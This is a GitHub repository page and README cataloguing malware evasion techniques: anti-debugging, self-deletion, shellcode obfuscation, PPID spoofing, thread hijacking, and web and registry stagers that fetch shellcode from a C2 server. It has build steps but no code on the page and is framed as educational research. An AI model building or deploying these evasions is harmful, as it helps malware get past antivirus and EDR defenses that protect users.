Skip to content
/ MalwareEvasionTechniques Public

Research project showcasing various malware evasion techniques used to bypass AVs and EDRs, continuously updated with new methods.

License

MIT license
32 stars 5 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

AbdouRoumi/MalwareEvasionTechniques

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

64 Commits
.github/ISSUE_TEMPLATE
.github/ISSUE_TEMPLATE
 
 
AntiDebugging-SimpleFunc
AntiDebugging-SimpleFunc
 
 
AntiDebugging_Using_PEB
AntiDebugging_Using_PEB
 
 
CustomError
CustomError
 
 
Event_Payload_control_execution
Event_Payload_control_execution
 
 
Ipv4Obfuscation
Ipv4Obfuscation
 
 
Ipv6Obfuscation
Ipv6Obfuscation
 
 
LocalThreadHijacking
LocalThreadHijacking
 
 
MacObfuscation
MacObfuscation
 
 
Mutex_Payload_Execution_Control
Mutex_Payload_Execution_Control
 
 
PPID-Spoofing
PPID-Spoofing
 
 
RC4Enc
RC4Enc
 
 
RegistryStager
RegistryStager
 
 
RemoteProcessesScanner
RemoteProcessesScanner
 
 
RemoteScannerUpdated
RemoteScannerUpdated
 
 
Self_delete
Self_delete
 
 
Semaphores_Payload_Execution_Control
Semaphores_Payload_Execution_Control
 
 
WebStager
WebStager
 
 
XOR_encryption
XOR_encryption
 
 
.gitattributes
.gitattributes
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
MalwareEvasionTechniques.sln
MalwareEvasionTechniques.sln
 
 
README.md
README.md
 
 

Repository files navigation

Malware Evasion Techniques

Typing SVG

Overview

Welcome to the MalwareEvasionTechniques repository! This project is a growing collection of malware evasion techniques that I am learning and implementing. The techniques in this repository are designed to bypass various detection mechanisms like debuggers,EDRs,AVs, sandboxes, and other security defenses.

The goal of this repository is to document my learning journey and provide examples of different evasion strategies for educational purposes. The repository will be regularly updated as I explore new techniques.

Table of Contents

Techniques Included

This repository currently includes the following evasion techniques, with more to come:

  • Anti-Debugging: Techniques to detect and evade debuggers.

    • AntiDebugging-SimpleFunc: A simple anti-debugging function.
    • AntiDebugging_Using_PEB: Anti-debugging using the Process Environment Block (PEB).

  • Self-Deletion: Methods that allow a malware sample to delete itself after execution.

    • Self_delete: Example of a self-deleting executable.

  • Custom Error Handling: Using custom error handling for evasion.

    • CustomError: Examples of evasion using custom error handling routines.

  • XOR encryption: Using XOR encryption for evasion.

    • XorEncryption: Examples of evasion using xor encryption.

  • Ipv4Obfuscation: Using IPV4 to obfuscate the Shellcode for evasion.

  • Ipv6Obfuscation: Using IPV6 to obfuscate the Shellcode for evasion.

  • MacObfuscation: Using MacAdresses to obfuscate the Shellcode for evasion.

  • Remote Process Scanner: Using CreateToolHelp32Snapshot to scan the remote processes.

  • Web Stager: Using a C2 server to download the Shellcode.

  • Registry Stager: Using Windows registry to hide shellcode.

Upcoming Techniques

This repository will continue to expand as I learn more. Here are some of the topics I plan to explore:

  • Code Obfuscation
  • Memory Evasion Techniques
  • Process Injection
  • Environment Detection
  • Encryptions

Stay tuned for updates!

Installation

To set up and run the examples in this repository:

  1. Clone the Repository:

    git clone https://github.com/AbdouRoumi/MalwareEvasionTechniques.git

  2. Open the Solution:

    • Open MalwareEvasionTechniques.sln in Visual Studio.

  3. Build the Solution:

    • Build the solution using the appropriate configuration (Debug/Release).

  4. Run the Executables:

    • Execute the compiled binaries to observe the malware evasion techniques in action.

Usage

Each directory contains a specific evasion technique with relevant source code. You can explore the code, build it, and run it to see how the evasion works. The code is documented to help you understand the logic behind each technique.

# Example
cd Self_delete
# Open the solution and build the project

Contributing

Contributions are welcome! If you have additional evasion techniques or improvements to existing ones, feel free to submit a pull request. Please ensure your contributions adhere to ethical guidelines and are intended for educational and research purposes only.

Disclaimer

This repository is for educational and research purposes only. The techniques demonstrated here are intended to help security professionals understand and defend against malware evasion tactics. Misuse of the information contained in this repository is not condoned by the author.

License

This project is licensed under the MIT License. See the LICENSE file for details.

About

Research project showcasing various malware evasion techniques used to bypass AVs and EDRs, continuously updated with new methods.

Resources

Readme

License

MIT license
Activity

Stars

32 stars

Watchers

3 watching

Forks

5 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages